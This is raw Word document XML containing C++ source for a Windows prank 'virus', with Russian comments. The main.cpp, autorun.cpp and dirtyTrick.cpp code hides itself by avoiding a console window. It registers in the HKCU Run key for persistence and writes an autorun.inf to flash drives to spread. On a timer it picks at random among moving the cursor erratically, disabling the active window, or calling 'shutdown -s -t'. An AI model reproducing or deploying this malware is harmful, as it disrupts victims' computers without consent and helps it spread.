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422" w:rsidRPr="001F021F" w:rsidRDefault="005A6EA0" w:rsidP="00F173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21F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>//“</w:t>
      </w:r>
      <w:r w:rsidRPr="001F021F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Header</w:t>
      </w:r>
      <w:r w:rsidRPr="001F021F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="001F021F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1F021F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r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cstring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tchar.h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IsMyProgramRegisteredForStartup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PCWSTR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RegisterMyProgramForStartup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PCWSTR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PCWSTR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PCWSTR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RegisterProgram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trick(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crazyMouse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disableWindow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restartSystem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7361" w:rsidRP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AutoRunInf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A6EA0" w:rsidRPr="001F021F" w:rsidRDefault="005A6EA0" w:rsidP="00F173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5A6EA0" w:rsidRPr="001F021F" w:rsidRDefault="005A6EA0" w:rsidP="00F173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F021F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>//main.cpp</w:t>
      </w:r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"Header.h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24C2" w:rsidRP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24C2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">//Используем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WinMain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009324C2"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 w:rsidRPr="009324C2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>), так как она не использует консоль, следовательно, вирус будет скрытен</w:t>
      </w:r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WINAPI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WinMain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hPrevInstance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LPSTR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lpCmdLine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nShowCmd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flag;</w:t>
      </w:r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flag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IsMyProgramRegisteredForStartup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L"My_Program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24C2" w:rsidRP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4C2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">//Проверка на наличие вируса в автозагрузке  </w:t>
      </w:r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4C2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RegisterProgram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автозагрузка</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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AutoRunInf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24C2" w:rsidRP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324C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324C2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009324C2" w:rsidRP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24C2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324C2" w:rsidRP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24C2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009324C2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009324C2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>//Вызов функции, творящей пакости</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009324C2" w:rsidRP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24C2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009324C2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trick</w:t>
      </w:r>
      <w:r w:rsidRPr="009324C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324C2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r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4C2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009324C2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Sleep(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360000);</w:t>
      </w:r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A6EA0" w:rsidRPr="001F021F" w:rsidRDefault="005A6EA0" w:rsidP="00F173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5A6EA0" w:rsidRPr="001F021F" w:rsidRDefault="005A6EA0" w:rsidP="00F173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F021F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>//autorun.cpp</w:t>
      </w:r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//autorun.cpp</w:t>
      </w:r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"Header.h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324C2" w:rsidRP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24C2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>//Проверка на наличие вируса в автозагрузке</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009324C2" w:rsidRP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IsMyProgramRegisteredForStartup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PCWSTR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pszAppName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fSuccess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dwRegType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REG_SZ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szPathToExe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MAX_PATH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{};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009324C2" w:rsidRP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9324C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dwSize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009324C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9324C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szPathToExe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009324C2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009324C2" w:rsidRP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24C2" w:rsidRP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24C2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009324C2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">//Открытие существующего ключа в реестре </w:t>
      </w:r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4C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RegOpenKeyExW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HKEY_CURRENT_USER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L"Software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\\Microsoft\\Windows\\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CurrentVersion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\\Run"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KEY_READ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fSuccess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0);</w:t>
      </w:r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Если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ключ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открылся</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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fSuccess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Чтение</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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RegGetValueW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pszAppName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RRF_RT_REG_SZ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dwRegType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szPathToExe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dwSize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24C2" w:rsidRP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fSuccess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009324C2"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lResult</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009324C2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> == 0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009324C2" w:rsidRP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24C2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324C2" w:rsidRP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24C2" w:rsidRP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24C2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009324C2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>//Если файл уже имеется</w:t>
      </w:r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4C2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fSuccess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324C2" w:rsidRP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fSuccess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wcslen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szPathToExe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&gt; 0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 ?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9324C2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9324C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9324C2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009324C2" w:rsidRP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24C2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324C2" w:rsidRP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24C2" w:rsidRP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24C2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009324C2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>//Если ключ был считан</w:t>
      </w:r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4C2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hKey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RegCloseKey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fSuccess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Запись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программы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в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автозапуск</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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RegisterMyProgramForStartup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PCWSTR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pszAppName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PCWSTR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pathToExe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PCWSTR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fSuccess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dwSize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MAX_PATH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2;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009324C2" w:rsidRP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wchar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009324C2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>_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</w:t>
      </w:r>
      <w:r w:rsidRPr="009324C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szValue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009324C2"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9324C2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>] = {};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009324C2" w:rsidRP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24C2" w:rsidRP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24C2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009324C2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">//Записываем путь к </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009324C2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>экзешнику</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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4C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wcscpy_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szValue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count,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L"\""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wcscat_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szValue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count,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pathToExe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wcscat_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szValue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count,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L"\"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wcscat_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szValue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count,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Создание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ключа</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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RegCreateKeyExW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HKEY_CURRENT_USER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L"Software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\\Microsoft\\Windows\\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CurrentVersion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\\Run"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0, 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KEY_WRITE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KEY_READ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fSuccess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0);</w:t>
      </w:r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fSuccess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dwSize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wcslen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szValue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+ 1) * 2;</w:t>
      </w:r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Запись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данных</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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RegSetValueExW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pszAppName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REG_SZ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szValue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dwSize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fSuccess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0);</w:t>
      </w:r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hKey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Закрытие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ключа</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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RegCloseKey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24C2" w:rsidRP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4C2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009324C2" w:rsidRP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24C2" w:rsidRP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24C2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324C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fSuccess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009324C2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009324C2" w:rsidRP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24C2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009324C2" w:rsidRP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24C2" w:rsidRP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24C2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">//Функция получает путь к </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009324C2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ехе</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009324C2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>-файлу и передаёт его в //функцию для записи программы в автозапуск</w:t>
      </w:r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RegisterProgram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szPathToExe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MAX_PATH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Получение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пути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к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ехе-файлу</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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GetModuleFileNameW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szPathToExe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MAX_PATH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Вызов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программы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записи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в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автозапуск</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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RegisterMyProgramForStartup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L"My_Program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szPathToExe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L"-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foobar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24C2" w:rsidRP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24C2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009324C2" w:rsidRP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24C2" w:rsidRP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24C2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>//Создание файла автозапуска с флэш-носителя</w:t>
      </w:r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AutoRunInf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szRoot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4] = { 0 };</w:t>
      </w:r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szTarget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MAX_PATH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0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US"/>
        </w:rPr>
        <w:t>lstrcpy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LPSTR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szTarget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LPSTR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szRoot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US"/>
        </w:rPr>
        <w:t>lstrcat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LPSTR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szTarget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LPSTR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"autorun.inf"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Создать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дескриптор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файла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US"/>
        </w:rPr>
        <w:t>CreateFile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LPSTR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szTarget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GENERIC_WRITE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CREATE_ALWAYS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FILE_ATTRIBUTE_NORMAL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057C" w:rsidRDefault="009324C2" w:rsidP="009324C2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324C2" w:rsidRPr="001F021F" w:rsidRDefault="009324C2" w:rsidP="009324C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5A6EA0" w:rsidRPr="001F021F" w:rsidRDefault="005A6EA0" w:rsidP="00F173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F021F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>//dirtyT</w:t>
      </w:r>
      <w:r w:rsidR="00F17361" w:rsidRPr="001F021F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ric</w:t>
      </w:r>
      <w:r w:rsidRPr="001F021F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>k.cpp</w:t>
      </w:r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Header.h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24C2" w:rsidRP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24C2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>//Функция управления пакостями</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009324C2" w:rsidRP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24C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trick</w:t>
      </w:r>
      <w:r w:rsidRPr="009324C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324C2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009324C2" w:rsidRP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24C2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009324C2" w:rsidRP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24C2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009324C2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>//Генерация случайного числа</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009324C2" w:rsidRP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24C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9324C2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="00000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324C2"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time</w:t>
      </w:r>
      <w:r w:rsidRPr="009324C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324C2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>0));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009324C2" w:rsidRP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24C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24C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9324C2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009324C2" w:rsidRP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24C2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9324C2"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rand</w:t>
      </w:r>
      <w:r w:rsidRPr="009324C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324C2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>) % 3) + 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009324C2" w:rsidRP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24C2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009324C2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>//Вызов соответствующей пакости</w:t>
      </w:r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4C2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(r) {</w:t>
      </w:r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1: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crazyMouse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2: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disableWindow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24C2" w:rsidRP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324C2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3: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restartSystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009324C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324C2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009324C2" w:rsidRP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24C2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324C2" w:rsidRP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24C2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009324C2" w:rsidRP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24C2" w:rsidRP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24C2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>//Функция беспорядочно перемещает курсор по экрану</w:t>
      </w:r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crazyMouse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2000;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Устанавливаем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рандомные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координаты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для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курсора</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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{ rand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% 800, rand() % 600 };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SetCursorPos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Sleep(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100);</w:t>
      </w:r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Блокировка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активного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окна</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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disableWindow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GetForegroundWindow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EnableWindow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Выключение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компьютера</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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restartSystem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324C2" w:rsidRDefault="009324C2" w:rsidP="0093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"shutdown -s -t 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A6EA0" w:rsidRPr="001F021F" w:rsidRDefault="009324C2" w:rsidP="009324C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sectPr w:rsidR="005A6EA0" w:rsidRPr="001F021F" w:rsidSect="005A6EA0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49E"/>
    <w:rsid w:val="000C249E"/>
    <w:rsid w:val="000C4EBF"/>
    <w:rsid w:val="001F021F"/>
    <w:rsid w:val="005A6EA0"/>
    <w:rsid w:val="009324C2"/>
    <w:rsid w:val="00A36014"/>
    <w:rsid w:val="00B464B9"/>
    <w:rsid w:val="00D5057C"/>
    <w:rsid w:val="00EA30A1"/>
    <w:rsid w:val="00F04422"/>
    <w:rsid w:val="00F1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715D5"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BB48AA81-D8CD-44EA-89B9-F42FC8E5D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Vladislav Karnitskiy</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-06-12T05:23:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-12-09T19:34:00Z</dcterms:modified>
</cp:coreProperties>
</file>